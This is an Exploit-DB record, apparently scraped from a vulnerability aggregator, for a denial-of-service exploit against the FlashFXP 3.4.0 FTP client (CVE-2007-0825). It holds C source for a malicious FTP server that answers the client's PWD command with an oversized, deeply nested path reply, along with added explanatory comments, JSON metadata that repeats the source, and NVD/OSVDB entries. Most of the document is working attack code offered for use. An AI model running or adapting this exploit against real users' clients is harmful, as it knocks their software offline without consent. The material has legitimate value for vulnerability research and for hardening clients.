FlashFXP 3.4.0 build 1145 - Remote Buffer Overflow DoS Exploit
2007-02-06T00:00:00
ID EDB-ID:3276 Type exploitdb Reporter Marsu Modified 2007-02-06T00:00:00
Description
FlashFXP 3.4.0 build 1145 Remote Buffer Overflow DoS Exploit. CVE-2007-0825. DoS exploit for the Windows platform
/***************************************************************************
* FlashFXP V 3.4.0 build 1145 Buffer Overflow DoS *
* *
* *
* There's a strange bug in FlashFXP. *
* When sending a long PWD command with more than 5420 \ separated by at *
* least one different char, it is possible to make the app unstable. *
* It will first freeze for 45s, consuming 100% of resources, and then, if *
* the user hits disconnect and then reconnects to the server, it will enter *
* an infinite loop trying to put data on the stack. *
* *
* *
* I admit it is a little bit tricky but maybe someone will find a better *
* way to exploit this vuln. *
* *
* Have Fun! *
* *
* Coded by Marsu <Marsupilamipowa@hotmail.fr> *
***************************************************************************/
#include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#include "windows.h"
#pragma comment(lib, "ws2_32.lib")
/*
 * Entry point: a minimal fake FTP server that listens on TCP port 21, walks a
 * connecting client through USER/PASS/SYST/FEAT with canned replies, and then
 * answers the client's PWD with a "257" reply whose quoted path is roughly
 * 10.8 KB of alternating 'a' and slash-derived bytes. The whole exchange is
 * repeated twice (n == 1, n == 2) because the header comment says the client
 * must disconnect and reconnect for the hang to occur.
 *
 * Defender's reading: the client-side defect being exercised is trusting the
 * length/depth of a server-supplied 257 path before parsing it (the NVD text
 * for CVE-2007-0825 describes CPU consumption from a deeply nested path). A
 * robust client bounds reply length and path depth before it walks them, and
 * a 10 KB PWD reply is far outside any legitimate path and easy to flag.
 * Note the header's wording: it is the server's PWD *reply*, not a PWD
 * command, that is oversized here.
 *
 * argc/argv are unused; there are no command-line options.
 *
 * Build notes visible in the listing: `sockaddr_in` is used without the
 * `struct` keyword and NULL is assigned to int socket handles, which suggests
 * this was compiled as C++ rather than C. The string literal in the second
 * printf near the end of the loop is split across a physical line break,
 * which will not compile as written -- most likely a reformatting artifact of
 * the published listing rather than the author's source.
 */
int main(int argc, char* argv[])
{
char recvbuff[1024];
char evilbuff[11000];
/* Used without `struct` -- C++ build assumed. */
sockaddr_in sin;
int server,client;
WSADATA wsaData;
/* Return value not checked; a failed WSAStartup makes every later call fail. */
WSAStartup(MAKEWORD(1,1), &wsaData);
int n=1;
/* Two full client sessions: see the header comment on disconnect/reconnect. */
while (n<=2)
{
/* None of socket/bind/listen/accept are checked for failure; on error the
 * code proceeds with an invalid handle and the send() below is the first
 * place a problem would surface. */
server = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
sin.sin_family = PF_INET;
sin.sin_addr.s_addr = htonl(INADDR_ANY);
sin.sin_port = htons( 21 );
bind(server,(SOCKADDR*)&sin,sizeof(sin));
printf("[*] Listening on port 21...\n");
listen(server,5);
printf("[*] Waiting for client ...\n");
client=accept(server,NULL,NULL);
printf("[+] Client connected\n");
/* FTP greeting. evilbuff is reused for every reply and the 18-byte copy
 * includes the terminating NUL, so strlen() below gives the reply length. */
memcpy(evilbuff,"220 Hello there\r\n\0",18);
/* recvbuff is zeroed here (and again before SYST) but not before every
 * recv(); recv() never NUL-terminates, and a full 1024-byte read would leave
 * no terminator for the printf("%s") calls that follow. */
memset(recvbuff,'\0',1024);
if (send(client,evilbuff,strlen(evilbuff),0)==-1)
{
printf("[-] Error in send!\n");
exit(-1);
}
//USER -- whatever the client sends is echoed to stdout and answered with 331
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
memcpy(evilbuff,"331 \r\n\0",7);
send(client,evilbuff,strlen(evilbuff),0);
/* Short pause; presumably pacing for the client -- intent not documented. */
Sleep(50);
//PASS -- accepted unconditionally with 230
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
memcpy(evilbuff,"230 \r\n\0",7);
send(client,evilbuff,strlen(evilbuff),0);
//SYST -- answered with a fixed "215 WINDOWS"
memset(recvbuff,'\0',1024);
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
memcpy(evilbuff,"215 WINDOWS\r\n\0",14);
send(client,evilbuff,strlen(evilbuff),0);
//FEAT -- empty feature list
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
memcpy(evilbuff,"211 END\r\n\0",10);
send(client,evilbuff,strlen(evilbuff),0);
//PWD -- the oversized 257 reply is built here
int i=5;
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
/* Fill evilbuff[5..10839] with alternating 'a' and separator bytes.
 * '//' is a multi-character constant: its value is implementation-defined
 * and only the low byte is stored by memset, so the separator actually
 * written depends on the compiler. The header comment says backslash; the
 * literal here is slash-derived -- which byte was intended is unclear. */
while (i<10840) {
memset(evilbuff+i,'a',1);
i++;
memset(evilbuff+i,'//',1);
i++;
}
/* Prefix overwrites bytes 0..4 ("257 " plus the opening quote); the closing
 * quote, CRLF and NUL land at 10840..10843, so strlen() is 10843 and the
 * whole reply fits inside the 11000-byte buffer. */
memcpy(evilbuff,"257 \"",5);
memcpy(evilbuff+10840,"\"\r\n\0",4);
send(client,evilbuff,strlen(evilbuff),0);
closesocket(client);
closesocket(server);
/* NULL assigned to int handles; INVALID_SOCKET is the conventional sentinel
 * for a closed Winsock socket. */
client=server=NULL;
if (n<2) {
printf("[+] Now FlashFXP is out for 45sec.\n");
/* This literal spans a physical line break -- not valid C/C++ as listed. */
printf("[+] Note that user MUST click on disconnect and then reconnect\n
to trigger the bug.\n\n");
}
n++;
}
Sleep(2000);
printf("\n[+] FlashFXP must be DoSed\n");
return 0;
}
// milw0rm.com [2007-02-06]
{"id": "EDB-ID:3276", "hash": "c3714f6cd9e1bf9c565e7acf13e14ac1", "type": "exploitdb", "bulletinFamily": "exploit", "title": "FlashFXP 3.4.0 build 1145 - Remote Buffer Overflow DoS Exploit", "description": "FlashFXP 3.4.0 build 1145 Remote Buffer Overflow DoS Exploit. CVE-2007-0825. Dos exploit for windows platform", "published": "2007-02-06T00:00:00", "modified": "2007-02-06T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/3276/", "reporter": "Marsu", "references": [], "cvelist": ["CVE-2007-0825"], "lastseen": "2016-01-31T18:06:55", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 7.6, "vector": "NONE", "modified": "2016-01-31T18:06:55"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-0825"]}, {"type": "osvdb", "idList": ["OSVDB:35796"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:2894"]}], "modified": "2016-01-31T18:06:55"}, "vulnersScore": 7.6}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/3276/", "sourceData": "/***************************************************************************\r\n* FlashFXP V 3.4.0 build 1145 Buffer Overflow DoS *\r\n* *\r\n* *\r\n* There's a strange bug in FlashFXP. *\r\n* When sending a long PWD command with more than 5420 \\ separated by at *\r\n* least one different char, it is possible to make the app unstable. *\r\n* It will first freeze during 45s consuming 100% resources, and then, if *\r\n* the user hits disconnect and then reconnects to the server it will enter *\r\n* in an infinite loop trying to put data on the stack. *\r\n* *\r\n* *\r\n* I admit it is a little bit tricky but maybe someone will find a better *\r\n* way to exploit this vuln. *\r\n* *\r\n* Have Fun! 
*\r\n* *\r\n* Coded by Marsu <Marsupilamipowa@hotmail.fr> *\r\n***************************************************************************/\r\n\r\n\r\n\r\n#include \"winsock2.h\"\r\n#include \"stdio.h\"\r\n#include \"stdlib.h\"\r\n#include \"windows.h\"\r\n#pragma comment(lib, \"ws2_32.lib\")\r\n\r\nint main(int argc, char* argv[])\r\n{\r\n\tchar recvbuff[1024];\r\n\tchar evilbuff[11000];\r\n\tsockaddr_in sin;\r\n\tint server,client;\r\n\tWSADATA wsaData;\r\n\tWSAStartup(MAKEWORD(1,1), &wsaData);\r\n\r\n\tint n=1;\r\n\twhile (n<=2)\r\n\t{\r\n\t\tserver = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n\t\tsin.sin_family = PF_INET;\r\n\t\tsin.sin_addr.s_addr = htonl(INADDR_ANY);\r\n\t\tsin.sin_port = htons( 21 );\r\n\t\tbind(server,(SOCKADDR*)&sin,sizeof(sin));\r\n\t\tprintf(\"[*] Listening on port 21...\\n\");\r\n\t\tlisten(server,5);\r\n\t\tprintf(\"[*] Waiting for client ...\\n\");\r\n\t\tclient=accept(server,NULL,NULL);\r\n\t\tprintf(\"[+] Client connected\\n\");\r\n\r\n\r\n\t\tmemcpy(evilbuff,\"220 Hello there\\r\\n\\0\",18);\r\n\t\tmemset(recvbuff,'\\0',1024);\r\n\r\n\t\tif (send(client,evilbuff,strlen(evilbuff),0)==-1)\r\n\t\t{\r\n\t\t\tprintf(\"[-] Error in send!\\n\");\r\n\t\t\texit(-1);\r\n\t\t}\r\n\r\n\t\t//USER\r\n\t\trecv(client,recvbuff,1024,0);\r\n\t\tprintf(\"%s\", recvbuff);\r\n\t\tmemcpy(evilbuff,\"331 \\r\\n\\0\",7);\r\n\t\tsend(client,evilbuff,strlen(evilbuff),0);\r\n\t\tSleep(50);\r\n\r\n\t\t//PASS\r\n\t\trecv(client,recvbuff,1024,0);\r\n\t\tprintf(\"%s\", recvbuff);\r\n\t\tmemcpy(evilbuff,\"230 \\r\\n\\0\",7);\r\n\t\tsend(client,evilbuff,strlen(evilbuff),0);\r\n\r\n\t\t//SYST\r\n\t\tmemset(recvbuff,'\\0',1024);\r\n\t\trecv(client,recvbuff,1024,0);\r\n\t\tprintf(\"%s\", recvbuff);\r\n\t\tmemcpy(evilbuff,\"215 WINDOWS\\r\\n\\0\",14);\r\n\t\tsend(client,evilbuff,strlen(evilbuff),0);\r\n\r\n\t\t//FEAT\r\n\t\trecv(client,recvbuff,1024,0);\r\n\t\tprintf(\"%s\", recvbuff);\r\n\t\tmemcpy(evilbuff,\"211 
END\\r\\n\\0\",10);\r\n\t\tsend(client,evilbuff,strlen(evilbuff),0);\r\n\r\n\t\t//PWD\r\n\t\tint i=5;\r\n\t\trecv(client,recvbuff,1024,0);\r\n\t\tprintf(\"%s\", recvbuff);\r\n\t\twhile (i<10840) {\r\n\t\t\tmemset(evilbuff+i,'a',1);\r\n\t\t\ti++;\r\n\t\t\tmemset(evilbuff+i,'//',1);\r\n\t\t\ti++;\r\n\t\t}\r\n\t\tmemcpy(evilbuff,\"257 \\\"\",5);\r\n\t\tmemcpy(evilbuff+10840,\"\\\"\\r\\n\\0\",4);\r\n\t\tsend(client,evilbuff,strlen(evilbuff),0);\r\n\t\tclosesocket(client);\r\n\t\tclosesocket(server);\r\n\t\tclient=server=NULL;\r\n\r\n\t\tif (n<2) {\r\n\t\t\tprintf(\"[+] Now FlashFXP is out for 45sec.\\n\");\r\n\t\t\tprintf(\"[+] Note that user MUST click on disconnect and then reconnect\\n \r\n to trigger the bug.\\n\\n\");\r\n\t\t}\r\n\t\tn++;\r\n\t}\r\n\tSleep(2000);\r\n\tprintf(\"\\n[+] FlashFXP must be DoSed\\n\");\r\n\treturn 0;\r\n}\r\n\r\n// milw0rm.com [2007-02-06]\r\n", "osvdbidlist": ["35796"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:08:58", "bulletinFamily": "NVD", "description": "FlashFXP 3.4.0 build 1145 allows remote servers to cause a denial of service (CPU consumption) via a response to a PWD command that contains a long string with deeply nested directory structure, possibly due to a buffer overflow.", "modified": "2017-10-19T01:30:00", "id": "CVE-2007-0825", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0825", "published": "2007-02-07T22:28:00", "title": "CVE-2007-0825", "type": "cve", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:31", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nISS X-Force ID: 32416\nGeneric Exploit URL: http://milw0rm.com/exploits/3276\n[CVE-2007-0825](https://vulners.com/cve/CVE-2007-0825)\nBugtraq ID: 22433\n", "modified": "2007-02-06T20:53:45", "published": "2007-02-06T20:53:45", "href": "https://vulners.com/osvdb/OSVDB:35796", "id": "OSVDB:35796", "title": "FlashFXP PWD Command Long String Remote DoS", "type": "osvdb", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:17", "bulletinFamily": "software", "description": "Bugs during parsing FTP server data.", "modified": "2003-06-09T00:00:00", "published": "2003-06-09T00:00:00", "id": "SECURITYVULNS:VULN:2894", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:2894", "title": "Multiple bugs in FTP clients", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}]}